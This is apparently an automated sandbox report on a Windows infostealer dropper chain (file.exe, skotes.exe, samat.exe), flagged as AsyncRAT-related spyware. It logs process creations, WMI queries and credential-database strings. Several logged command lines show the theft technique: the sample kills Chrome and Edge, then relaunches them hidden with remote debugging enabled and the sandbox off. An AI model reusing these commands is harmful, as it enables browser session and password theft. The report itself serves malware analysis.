                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E08C88_2_00007FF7E12E08C8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E64188_2_00007FF7E12E6418
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CA4748_2_00007FF7E12CA474
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12CACAD8_2_00007FF7E12CACAD
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D1B508_2_00007FF7E12D1B50
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E3C108_2_00007FF7E12E3C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D2C108_2_00007FF7E12D2C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E5C008_2_00007FF7E12E5C00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E5E7C8_2_00007FF7E12E5E7C
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D9EA08_2_00007FF7E12D9EA0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12DDEF08_2_00007FF7E12DDEF0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D1D548_2_00007FF7E12D1D54
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D5D308_2_00007FF7E12D5D30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12DE5708_2_00007FF7E12DE570
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D35A08_2_00007FF7E12D35A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E18748_2_00007FF7E12E1874
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E08C88_2_00007FF7E12E08C8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E40AC8_2_00007FF7E12E40AC
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D80E48_2_00007FF7E12D80E4
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D17408_2_00007FF7E12D1740
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12E97288_2_00007FF7E12E9728
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D87948_2_00007FF7E12D8794
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12D1F608_2_00007FF7E12D1F60
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF7E12C98008_2_00007FF7E12C9800
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB97108_2_00007FF8B7EB9710
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB94B08_2_00007FF8B7EB94B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EB53508_2_00007FF8B7EB5350
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EE3A308_2_00007FF8B7EE3A30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EE33008_2_00007FF8B7EE3300
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8064C708_2_00007FF8B8064C70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B805CF308_2_00007FF8B805CF30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80022508_2_00007FF8B8002250
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF92B08_2_00007FF8B7FF92B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80473508_2_00007FF8B8047350
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF69308_2_00007FF8B7FF6930
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80429508_2_00007FF8B8042950
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80099A08_2_00007FF8B80099A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FEFA108_2_00007FF8B7FEFA10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B804BB008_2_00007FF8B804BB00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8044B208_2_00007FF8B8044B20
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8036B408_2_00007FF8B8036B40
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE9B908_2_00007FF8B7FE9B90
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8092BF08_2_00007FF8B8092BF0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE3C108_2_00007FF8B7FE3C10
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FFCC408_2_00007FF8B7FFCC40
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B803CC408_2_00007FF8B803CC40
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B801CC598_2_00007FF8B801CC59
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8078C808_2_00007FF8B8078C80
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B806ACA08_2_00007FF8B806ACA0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B803BCC08_2_00007FF8B803BCC0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8030CE08_2_00007FF8B8030CE0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF9D008_2_00007FF8B7FF9D00
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FEBD308_2_00007FF8B7FEBD30
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B800DDB08_2_00007FF8B800DDB0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF0DC08_2_00007FF8B7FF0DC0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8024E708_2_00007FF8B8024E70
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B807CEA08_2_00007FF8B807CEA0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8094FC08_2_00007FF8B8094FC0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B806BFC08_2_00007FF8B806BFC0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80080208_2_00007FF8B8008020
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80070408_2_00007FF8B8007040
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE41208_2_00007FF8B7FE4120
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF21E08_2_00007FF8B7FF21E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80A42B08_2_00007FF8B80A42B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FFD2B08_2_00007FF8B7FFD2B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B802F2D08_2_00007FF8B802F2D0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B800F2F08_2_00007FF8B800F2F0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE32F58_2_00007FF8B7FE32F5
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B800D3108_2_00007FF8B800D310
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B806A3008_2_00007FF8B806A300
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE73368_2_00007FF8B7FE7336
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FFC3808_2_00007FF8B7FFC380
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80543B08_2_00007FF8B80543B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80854A08_2_00007FF8B80854A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE94D08_2_00007FF8B7FE94D0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B802A5108_2_00007FF8B802A510
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE45708_2_00007FF8B7FE4570
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80045A08_2_00007FF8B80045A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B803B5B08_2_00007FF8B803B5B0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80115A08_2_00007FF8B80115A0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B800E5C08_2_00007FF8B800E5C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FF36508_2_00007FF8B7FF3650
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B803E6708_2_00007FF8B803E670
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80406C08_2_00007FF8B80406C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80577508_2_00007FF8B8057750
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80527E68_2_00007FF8B80527E6
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE48208_2_00007FF8B7FE4820
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B804C8408_2_00007FF8B804C840
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B80258808_2_00007FF8B8025880
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FE288E8_2_00007FF8B7FE288E
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7FEA8C08_2_00007FF8B7FEA8C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8261FB08_2_00007FF8B8261FB0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82623E08_2_00007FF8B82623E0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82748108_2_00007FF8B8274810
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82745C08_2_00007FF8B82745C0
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82813008_2_00007FF8B8281300
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82822708_2_00007FF8B8282270
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B82819508_2_00007FF8B8281950
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B83315968_2_00007FF8B8331596
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B837D9808_2_00007FF8B837D980
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B8379A608_2_00007FF8B8379A60
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd 78725D2F55B7400A3FCAFECD35AF7AEB253FBC0FFCDF1903016EB0AABD1B4E50
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF7E12C2910 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B8011E20 appears 33 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B83AD32F appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF7E12C2710 appears 104 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B7E8C400 appears 47 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B83AD341 appears 64 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B7FE9340 appears 135 times
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: String function: 00007FF8B7FEA500 appears 163 times
                    Source: _overlapped.pyd.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: unicodedata.pyd.7.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: unknownDriver loaded: C:\Windows\System32\drivers\mstee.sys
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9980096219346049
                    Source: file.exeStatic PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
                    Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9980096219346049
                    Source: skotes.exe.0.drStatic PE information: Section: fjmpujlc ZLIB complexity 0.9948450497623291
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@147/209@43/19
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7E8C400 GetLastError,FormatMessageW,_Py_NoneStruct,_Py_NoneStruct,PyUnicode_FromWideChar,PyUnicode_DecodeMBCS,Py_BuildValue,LocalFree,PyErr_SetObject,_Py_Dealloc,8_2_00007FF8B7E8C400
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 8_2_00007FF8B7EBAC38 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CertOpenSystemStoreW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NewReference,PyLong_FromVoidPtr,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,8_2_00007FF8B7EBAC38
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5340:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;msedge.exe&quot;)
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT item1, item2 FROM metadata;
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: samat.exe, samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT a11, a102 FROM nssPrivate WHERE a102 = ?;
                    Source: samat.exe, 00000008.00000003.3921967640.000001BCCD5EF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3921967640.000001BCCD5D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: samat.exe, 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: file.exeReversingLabs: Detection: 47%
                    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2008 --field-trial-handle=1964,i,6524152562037050844,4104416786767478461,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
                    Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2088 --field-trial-handle=1992,i,15396176104267076459,4576140029387064159,262144 /prefetch:3
                    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1824 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:3
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
